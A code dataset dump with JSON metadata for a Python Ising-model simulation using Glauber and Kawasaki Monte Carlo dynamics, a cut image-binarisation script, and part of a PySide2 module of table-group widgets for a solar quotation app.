"line_number": 39, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 61, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 62, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 102, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 103, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 108, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 111, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 126, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path", "line_number": 147, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "numpy.resize", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.patches", 
"line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 205, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 234, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 234, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 234, "usage_type": "attribute"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 234, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 239, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 251, "usage_type": "call"}, {"api_name": "os.path", "line_number": 251, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path", "line_number": 258, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 261, "usage_type": "call"}, {"api_name": "os.path", "line_number": 261, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 265, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 265, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 265, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 266, "usage_type": "call"}, {"api_name": "os.path", "line_number": 266, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 266, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 279, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 280, "usage_type": "call"}, {"api_name": "parallel.ParallelExecutor", "line_number": 282, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 288, "usage_type": "call"}]} +{"seq_id": "70143169154", "text": "from PIL import Image\nimport numpy as np\n\nimg = Image.open(\"./images/bunny.png\")\nimg = img.convert(\"L\").convert(\"1\")\nimg.save(\"./images/binary_image.png\")\nimarr = np.asarray(img,dtype = np.int8)\nf = open(\"imagedata.txt\",\"w\")\ncur = 0\ncnt = 0\nfor i in range(imarr.shape[0]):\n for j in range(imarr.shape[1]):\n if(imarr[i][j]==1):\n cur+=(1<= 0.5:\r\n self.lattice[i][j] = 1.0\r\n else:\r\n self.lattice[i][j] = -1.0\r\n\r\n\r\n \"\"\"Impliment periodic boundary conditions \"\"\"\r\n def pbc(self, i):\r\n\r\n if (i > self.shape-1) or (i<0):\r\n i = np.mod(i, self.shape)\r\n return i\r\n else:\r\n return i\r\n\r\n########## Calculate properties of lattice ##########\r\n\r\n \"\"\"Calculate total magnetisation \"\"\"\r\n def total_mag(self):\r\n\r\n self.mag = np.abs(np.sum(self.lattice))\r\n return self.mag\r\n\r\n \"\"\"Calculate total energy\"\"\"\r\n def total_energy(self):\r\n\r\n e_tot = 0.0\r\n for i in range(self.shape):\r\n for j in 
range(self.shape):\r\n #Energy at each site is -J sum nearest neighbours (J=1 in this sim)\r\n e_ij = 0.0\r\n e_ij += self.lattice[self.pbc(i+1)][j]\r\n e_ij += self.lattice[i][self.pbc(j-1)]\r\n e_ij = -1*e_ij*self.lattice[i][j]\r\n e_tot += e_ij\r\n return e_tot\r\n\r\n \"\"\"Calculate Heat Capacity\"\"\"\r\n def heat_capacity(self, e, e_sqr):\r\n return (e_sqr-e**2.0)/((self.temp**2.0)*(self.shape*self.shape))\r\n\r\n \"\"\"Calculate Susceptibility\"\"\"\r\n def chi(self, m, m_sqr):\r\n return (m_sqr-m**2.0)/((self.temp*self.shape)**2.0)\r\n\r\n########## Implement Glauber dynamics #########\r\n\r\n \"\"\"Use Glauber dynamics to pick which lattice site to change\"\"\"\r\n def glauber(self):\r\n\r\n i = np.random.randint(self.shape)\r\n j = np.random.randint(self.shape)\r\n self.glauber_energy(i,j)\r\n\r\n \"\"\"Work out the energy difference caused by the change\"\"\"\r\n def glauber_energy(self, i, j):\r\n\r\n e_new = 0.0\r\n e_new += self.lattice[self.pbc(i-1)][j]\r\n e_new += self.lattice[self.pbc(i+1)][j]\r\n e_new += self.lattice[i][self.pbc(j+1)]\r\n e_new += self.lattice[i][self.pbc(j-1)]\r\n # Swap sign so energy change is just 2x the new energy\r\n self.delta_e = 2*e_new*self.lattice[i][j]\r\n self.glauber_metropolis_test(i, j)\r\n\r\n \"\"\"Run the Metropolis Test to determine if the spin should be flipped\"\"\"\r\n def glauber_metropolis_test(self, i, j):\r\n\r\n #If the energy state is preferable make the flip\r\n if self.delta_e <= 0:\r\n self.lattice[i][j] *= -1.0\r\n\r\n #If not, flip is accepted with prob exp(-deltaE/k_B T)\r\n else:\r\n random_number = np.random.random()\r\n probability = math.exp(-1.0*(self.delta_e/self.temp))\r\n if random_number <= probability:\r\n self.lattice[i][j] *= -1.0\r\n\r\n\r\n########## Implement Kawasaki dynamics #########\r\n\r\n \"\"\"Use Kawasaki dynamics to pick two random lattice sites to swap \"\"\"\r\n def kawasaki(self):\r\n\r\n i1 = np.random.randint(self.shape)\r\n i2 = np.random.randint(self.shape)\r\n j1 = np.random.randint(self.shape)\r\n j2 = np.random.randint(self.shape)\r\n\r\n #Keep doing random selection if the sites match\r\n while (i1==i2) and (j1==j2):\r\n i1 = np.random.randint(self.shape)\r\n i2 = np.random.randint(self.shape)\r\n j1 = np.random.randint(self.shape)\r\n j2 = np.random.randint(self.shape)\r\n\r\n #If the sites have the opposite spin swap them\r\n if self.lattice[i1][j1] != self.lattice[i2][j2]:\r\n self.kawasaki_energy(i1, i2, j1, j2)\r\n\r\n \"\"\"Work out the energy difference caused by the change\"\"\"\r\n def kawasaki_energy(self, i1, i2, j1, j2):\r\n\r\n #Calculate energy at both sites\r\n E1 = 0.0\r\n E1 += self.lattice[self.pbc(i1+1)][j1]\r\n E1 += self.lattice[self.pbc(i1-1)][j1]\r\n E1 += self.lattice[i1][self.pbc(j1+1)]\r\n E1 += self.lattice[i1][self.pbc(j1-1)]\r\n E1 = 2*E1*self.lattice[i1][j1]\r\n\r\n E2 = 0.0\r\n E2 += self.lattice[self.pbc(i2+1)][j2]\r\n E2 += self.lattice[self.pbc(i2-1)][j2]\r\n E2 += self.lattice[i2][self.pbc(j2+1)]\r\n E2 += self.lattice[i2][self.pbc(j2-1)]\r\n E2 = 2*E2*self.lattice[i2][j2]\r\n\r\n #Calculate delta_e\r\n self.delta_e = E1 + E2\r\n\r\n #Account for double counting nearest neighbours\r\n if (i1 == i2) and ((j1 == np.mod(j2+1, self.shape)) or (j1 == np.mod(j2-1, self.shape))):\r\n self.delta_e -= 2.0\r\n elif (j1 == j2) and ((i1 == np.mod(i2+1, self.shape)) or (i1 == np.mod(i2-1, self.shape))):\r\n self.delta_e -= 2.0\r\n\r\n self.kawasaki_metropolis_test(i1, i2, j1, j2)\r\n\r\n \"\"\"Run the Metropolis Test to determine if the spin should be
flipped\"\"\"\r\n def kawasaki_metropolis_test(self, i1, i2, j1, j2):\r\n\r\n #If the energy state is preferable make the flip\r\n if self.delta_e <= 0:\r\n self.lattice[i1][j1] *= -1.0\r\n self.lattice[i2][j2] *= -1.0\r\n\r\n #If not, flip is accepted with prob exp(-deltaE/k_B T)\r\n else:\r\n random_number = np.random.random()\r\n probability = math.exp(-1.0*(self.delta_e/self.temp))\r\n if random_number <= probability:\r\n self.lattice[i1][j1] *= -1.0\r\n self.lattice[i2][j2] *= -1.0\r\n\r\n########## Calculate Errors ##########\r\n\r\n \"\"\"Calculate standard error on the mean (used for E and Mag)\"\"\"\r\n def standard_error(self, values, values_sqr, list):\r\n return math.sqrt((values_sqr-values**2.0)/len(list))\r\n\r\n \"\"\"Use bootstrap method to calculate errors (used for Heat Capacity and Chi)\"\"\"\r\n def bootstrap_error(self, input, input_sqr, mode):\r\n\r\n #List for sample data points\r\n values = []\r\n values_sqr = []\r\n\r\n #Randomly sample 101 times \r\n for n in range(101):\r\n #Select indices\r\n samples = [np.random.randint(len(input)) for i in range(len(input))]\r\n #Select corresponding data\r\n input_samples = [input[sample] for sample in samples]\r\n input_sqr_samples = [input_sqr[sample] for sample in samples]\r\n\r\n #Find means\r\n sample_mean = np.mean(input_samples)\r\n sample_sqr_mean = np.mean(input_sqr_samples)\r\n \r\n #Find values\r\n if mode == 'Heat Capacity':\r\n value = self.heat_capacity(sample_mean, sample_sqr_mean)\r\n elif mode == 'Chi':\r\n value = self.chi(sample_mean, sample_sqr_mean)\r\n\r\n values.append(value)\r\n values_sqr.append(value**2.0)\r\n \r\n \r\n #Find error\r\n mean = np.mean(values)\r\n mean_sqr = np.mean(values_sqr)\r\n\r\n error = math.sqrt(mean_sqr-mean**2.0)\r\n\r\n return error\r\n\r\n########## Data Collection ##########\r\n\r\n def data_collection(self):\r\n\r\n # Set up data collection lists\r\n cv = []\r\n chi = []\r\n cv_error = []\r\n chi_error = []\r\n e_mean = []\r\n mag_mean = []\r\n e_error = []\r\n mag_error = []\r\n\r\n #Create list of temps\r\n temp_range = np.arange(1.0, 3.25, 0.25)\r\n\r\n for T in reversed(temp_range):\r\n self.temp = T\r\n print(f'\\n Temperature = {T} \\n')\r\n #Only need to create an initial lattice, subsequent temps can use last sweep from previous temp\r\n if T == temp_range[-1]:\r\n self.create_lattice()\r\n\r\n #collect data for Errors\r\n e_values = []\r\n e_sqr_values = []\r\n mag_values = []\r\n mag_sqr_values = []\r\n\r\n #run for set number of sweeps\r\n for i in range(self.sweeps):\r\n #in each sweep need to complete a test for every site in lattice\r\n for n in range(self.shape*self.shape):\r\n if self.method == 'Glauber':\r\n self.glauber()\r\n elif self.method == 'Kawasaki':\r\n self.kawasaki()\r\n if i ==0:\r\n e = self.total_energy()\r\n e_values.append(e)\r\n e_sqr_values.append(e**2.0)\r\n mag = self.total_mag()\r\n mag_values.append(mag)\r\n mag_sqr_values.append(mag**2.0)\r\n\r\n #Leave for 100 sweeps to equilibrate\r\n if i >100:\r\n #Every 10 sweeps collect data\r\n if i%10==0:\r\n e = self.total_energy()\r\n e_values.append(e)\r\n e_sqr_values.append(e**2.0)\r\n mag = self.total_mag()\r\n mag_values.append(mag)\r\n mag_sqr_values.append(mag**2.0)\r\n\r\n print(f'Sweep: {i}, Energy = {e}, Mag = {mag}')\r\n\r\n #At the end of all sweeps calculate means\r\n energy_mean = np.mean(e_values)\r\n energy_sqr_mean = np.mean(e_sqr_values)\r\n\r\n m_mean = np.mean(mag_values)\r\n m_sqr_mean = np.mean(mag_sqr_values)\r\n\r\n # Append to lists\r\n e_mean.append(energy_mean)\r\n
mag_mean.append(m_mean)\r\n\r\n #Calculate Cv and Chi\r\n cv.append(self.heat_capacity(energy_mean, energy_sqr_mean))\r\n chi.append(self.chi(m_mean, m_sqr_mean))\r\n\r\n #Calculate errors\r\n e_error.append(self.standard_error(energy_mean, energy_sqr_mean, e_values))\r\n mag_error.append(self.standard_error(m_mean, m_sqr_mean, mag_values))\r\n cv_error.append(self.bootstrap_error(e_values, e_sqr_values, mode='Heat Capacity'))\r\n chi_error.append(self.bootstrap_error(mag_values, mag_sqr_values, mode='Chi'))\r\n\r\n #Write all data to files\r\n self.write_files(e_mean, e_error, mag_mean, mag_error, cv, cv_error, chi, chi_error, temp_range)\r\n\r\n \"\"\"Write all data to .dat files \"\"\"\r\n def write_files(self, e, e_error, mag, mag_error, cv, cv_error, chi, chi_error, T):\r\n\r\n energy_file = open('energy_output.dat', 'w')\r\n mag_file = open('mag_output.dat', 'w')\r\n cv_file = open('cv_output.dat', 'w')\r\n chi_file= open('chi_output.dat', 'w')\r\n\r\n for i in range(len(T)):\r\n energy_file.write(str(T[i]) + ',')\r\n energy_file.write(str(np.flip(e)[i]) + ',')\r\n energy_file.write(str(np.flip(e_error)[i]) + '\\n')\r\n\r\n mag_file.write(str(T[i]) + ',')\r\n mag_file.write(str(np.flip(mag)[i]) + ',')\r\n mag_file.write(str(np.flip(mag_error)[i]) + '\\n')\r\n\r\n cv_file.write(str(T[i]) + ',')\r\n cv_file.write(str(np.flip(cv)[i]) + ',')\r\n cv_file.write(str(np.flip(cv_error)[i]) + '\\n')\r\n\r\n chi_file.write(str(T[i]) + ',')\r\n chi_file.write(str(np.flip(chi)[i]) + ',')\r\n chi_file.write(str(np.flip(chi_error)[i]) + '\\n')\r\n\r\n energy_file.close()\r\n mag_file.close()\r\n cv_file.close()\r\n chi_file.close()\r\n\r\n########## Run animation #########\r\n\r\n def update(self):\r\n\r\n for i in range(self.shape*self.shape):\r\n if self.method == 'Glauber':\r\n self.glauber()\r\n elif self.method == 'Kawasaki':\r\n self.kawasaki()\r\n\r\n def animate(self, i):\r\n self.update()\r\n self.mat.set_data(self.lattice)\r\n return self.mat,\r\n\r\n def run_animation(self):\r\n fig, ax = plt.subplots()\r\n self.mat = ax.imshow(self.lattice, cmap = 'seismic')\r\n ani = FuncAnimation(fig, self.animate, interval= 1, blit = False)\r\n\r\n plt.show()\r\n\r\nif __name__ == \"__main__\":\r\n\r\n if len(sys.argv) != 6:\r\n print(\"Incorrect Number of Arguments Presented.\")\r\n print(\"Usage: \" + sys.argv[0] + \" Method, Lattice Size, Temperature, Sweeps, Data/Animate\")\r\n quit()\r\n elif sys.argv[1] not in ['Glauber', 'Kawasaki']:\r\n print(\"Please enter either Glauber or Kawasaki\")\r\n quit()\r\n elif sys.argv[5] not in ['Data', 'Animate']:\r\n print('Please enter either Data or Animate')\r\n quit()\r\n else:\r\n method = sys.argv[1]\r\n shape = int(sys.argv[2])\r\n temp = float(sys.argv[3])\r\n sweeps = int(sys.argv[4])\r\n\r\n ising_model = IsingModel(method, shape, temp, sweeps)\r\n if sys.argv[5] == 'Data':\r\n ising_model.data_collection()\r\n if sys.argv[5] == 'Animate':\r\n ising_model.run_animation()\r\n", "repo_name": "LJBMyco/Ising_Model", "sub_path": "ising.py", "file_name": "ising.py", "file_ext": "py", "file_size_in_byte": 13205, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.random.seed", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random",
"line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.mod", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 107, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 120, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 121, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 128, "usage_type": "attribute"}, {"api_name": "numpy.mod", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 173, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 174, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 195, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 216, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 319, "usage_type": "call"}, {"api_name": 
"numpy.flip", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 328, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 351, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 351, "usage_type": "name"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 353, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 355, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 355, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 359, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 361, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 363, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 366, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 370, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 371, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 372, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 373, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 376, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 378, "usage_type": "attribute"}]} +{"seq_id": "25995817332", "text": "from PySide2 import QtCore, QtGui, QtWidgets\n\nfrom my_qt.table_widgets import BatteryNeedTable, BOSNeedTable, InverterNeedTable, PanelNeedTable, \\\n StructureNeedTable, BatteryQuotationTable, BOSQuotationTable, InverterQuotationTable, PanelQuotationTable, \\\n StructureQuotationTable, RelatedPanelQuotationTable, StaffTable\nfrom resources import url_plus\n\n\n# noinspection PyPep8Naming\nclass BaseGroup(QtWidgets.QGroupBox):\n def __init__(self, parent, my_strings, title, TableClass):\n super().__init__(parent)\n self.my_strings = my_strings\n self.title = title\n self.table = TableClass(self, self.my_strings)\n self.label = QtWidgets.QLabel(self)\n\n self.setup_gui()\n\n def setup_gui(self):\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(75)\n font.setUnderline(False)\n font.setBold(True)\n self.setFont(font)\n self.setObjectName('group')\n self.vertical_layout = QtWidgets.QVBoxLayout(self)\n self.vertical_layout.setContentsMargins(6, 6, 6, 6)\n self.vertical_layout.setObjectName('vertical_layout')\n self.vertical_layout.addWidget(self.table)\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.vertical_layout.addWidget(self.label)\n\n self.setTitle(self.title)\n self.label.setText(f'{self.my_strings.label_found}:')\n\n def load_items(self, items):\n if items:\n self.show()\n self.table.load_table_data(items)\n self.table.show_all_rows()\n self.table.resizeColumnsToContents()\n self.update_label_found()\n else:\n self.hide()\n\n def show_rows(self, indices):\n if indices:\n self.show()\n self.table.show_rows(indices)\n self.update_label_found()\n else:\n self.hide()\n\n def remove_row(self, item_id):\n for i in range(self.table.rowCount()):\n if item_id == self.table.item(i, 0).item_id:\n self.table.removeRow(i)\n break\n self.update_label_found()\n\n def update_label_found(self):\n self.label.setText(f'{self.my_strings.label_found}: 
{self.table.visible_row_count}')\n\n\nclass VisibleGroup(BaseGroup):\n def load_items(self, items):\n if items:\n self.table.show()\n self.table.load_table_data(items)\n self.table.show_all_rows()\n self.table.resizeColumnsToContents()\n self.update_label_found()\n else:\n self.table.hide()\n self.table.visible_row_count = 0\n self.update_label_found()\n\n\n# ---------------------------\n# ---------- Needs ----------\n# ---------------------------\nclass BatteryNeedGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_batteries, BatteryNeedTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_battery_need,\n function_delete=controller.delete_battery_need)\n\n\nclass BOSNeedGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_bos, BOSNeedTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_bos_need,\n function_delete=controller.delete_bos_need)\n\n\nclass InverterNeedGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_inverters, InverterNeedTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_inverter_need,\n function_delete=controller.delete_inverter_need)\n\n\nclass PanelNeedGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_panels, PanelNeedTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_panel_need,\n function_delete=controller.delete_panel_need)\n\n\nclass StructureNeedGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_structures, StructureNeedTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_structure_need,\n function_delete=controller.delete_structure_need)\n\n\n# --------------------------------\n# ---------- Quotations ----------\n# --------------------------------\nclass BatteryQuotationGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_batteries, BatteryQuotationTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_battery_quotation,\n function_delete=controller.delete_battery_quotation)\n\n\nclass BOSQuotationGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_bos, BOSQuotationTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_bos_quotation,\n function_delete=controller.delete_bos_quotation)\n\n\nclass InverterQuotationGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_inverters, InverterQuotationTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_inverter_quotation,\n function_delete=controller.delete_inverter_quotation)\n\n\nclass PanelQuotationGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_panels, 
PanelQuotationTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_panel_quotation,\n function_delete=controller.delete_panel_quotation)\n\n\nclass StructureQuotationGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_structures, StructureQuotationTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_structure_quotation,\n function_delete=controller.delete_structure_quotation)\n\n\n# ----------------------------------------\n# ---------- Related quotations ----------\n# ----------------------------------------\nclass RelatedPanelQuotationGroup(VisibleGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_related_panel_quotations, RelatedPanelQuotationTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.double_clicked_table_rel,\n function_delete=None)\n\n def load_items(self, items):\n if items:\n self.table.show()\n self.table.load_table_data(items)\n self.table.show_all_rows()\n self.table.resizeColumnsToContents()\n self.update_label_found()\n else:\n self.table.hide()\n self.table.visible_row_count = 0\n self.update_label_found()\n\n\n# ---------------------------\n# ---------- Staff ----------\n# ---------------------------\nclass StaffGroup(VisibleGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_staff, StaffTable)\n\n def setup_gui(self):\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(75)\n font.setUnderline(False)\n font.setBold(True)\n self.setFont(font)\n self.setObjectName('group')\n self.vertical_layout = QtWidgets.QVBoxLayout(self)\n self.vertical_layout.setContentsMargins(6, 6, 6, 6)\n self.vertical_layout.setObjectName('vertical_layout')\n self.vertical_layout.addWidget(self.table)\n self.horizontal_layout = QtWidgets.QHBoxLayout()\n self.horizontal_layout.setObjectName('horizontal_layout')\n self.label = QtWidgets.QLabel(self)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.label.setFont(font)\n self.label.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop)\n self.label.setObjectName('label')\n self.horizontal_layout.addWidget(self.label)\n self.button_add_employee = QtWidgets.QPushButton(self)\n self.button_add_employee.setMinimumSize(QtCore.QSize(50, 30))\n self.button_add_employee.setMaximumSize(QtCore.QSize(50, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n 